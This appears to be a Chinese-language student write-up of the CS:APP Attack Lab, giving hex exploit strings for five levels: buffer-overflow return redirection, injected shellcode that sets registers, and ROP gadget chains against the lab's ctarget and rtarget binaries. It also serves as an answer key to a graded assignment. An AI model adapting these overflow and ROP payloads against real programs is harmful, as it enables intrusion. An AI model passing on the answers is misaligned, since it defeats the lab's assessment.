【LittleXi】Attacklab
Level1
题目大意:利用缓冲区溢出机制,当test函数调用函数getbuf时,不要直接返回到test函数,而是返回到touch1
解题思路:利用缓冲区溢出,我们不断输入字符串,直到填满整个黄色空间,继续输入字符串(touch1的地址),使得getbuf的返回地址被掩盖为touch1,就成功调用touch1了
答案:
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
86 5e 55 55 55 55 00 00
Level2
题目大意:类似于Level1,同样利用缓冲区溢出机制,当test函数调用函数getbuf时,不要直接返回到test函数,而是返回到touch2,并在返回touch2之前,将touch2的参数修改为cookil
解题思路:利用缓冲区溢出,我们不断输入字符串,直到填满整个黄色空间,继续输入字符串(读入字符串时栈顶rsp的地址rsp),使得getbuf的返回地址被掩盖为rsp的地址,然后执行我们注入的汇编代码使得修改%rdi的值,并ret
到touch2的地址
注意事项:对于rsp的地址可以用gdb调试到栈顶,然后输入 p /x $rsp
即可直接查看rsp的地址,注入代码流程应该是先手写汇编代码,然后利用
-
gcc -c example.s
-
objdump -d example.o > example.d
这两条指令得到程序的机器码
答案:
48 c7 c7 56 db eb 76 48
b8 ba 5e 55 55 55 55 00
00 50 c3 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 a0 61 55 00 00 00 00
Level3
题目大意:题目意思和Level2大致相同,只是需要给寄存器%rdi的值换为了字符串的地址就行了
解题思路:我们此时需要找到一个位置来存储字符串,不妨就存储在末尾,然后我们调用栈顶地址之后返回string的开始地址就行了
答案:
48 8d 3c 24 48 b8 df 5f
55 55 55 55 00 00 50 c3
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 a0 61 55 00 00 00 00
37 36 65 62 64 62 35 36 00
Level4
题目大意:这个是第二阶段的题目,在rtarget中将采用栈随机化,和限制可执行区域来阻止攻击,attacker的目的是将cookie传入touch2函数中,然后调用touch2函数
解题思路:可以直接将rtarget反汇编,去rtarget里面去寻找pop %rax和mov %rax %rdi
答案:
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
b4 60 55 55 55 55 00 00
56 db eb 76 00 00 00 00
df 60 55 55 55 55 00 00
ba 5e 55 55 55 55 00 00
Level5
题目大意:和Level3一样的,只是不能直接传值
解题思路:可以综合Level3和Level4的操作,先存储%rsp的地址,然后把按%rsp偏移地址后指向的cookie串的地址传给%rdi就行了
答案:
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
34 62 55 55 55 55 00 00
df 60 55 55 55 55 00 00
85 58 55 55 55 55 00 00
30 00 00 00 00 00 00 00
f2 60 55 55 55 55 00 00
df 60 55 55 55 55 00 00
df 5f 55 55 55 55 00 00
37 36 65 62 64 62 35 36 00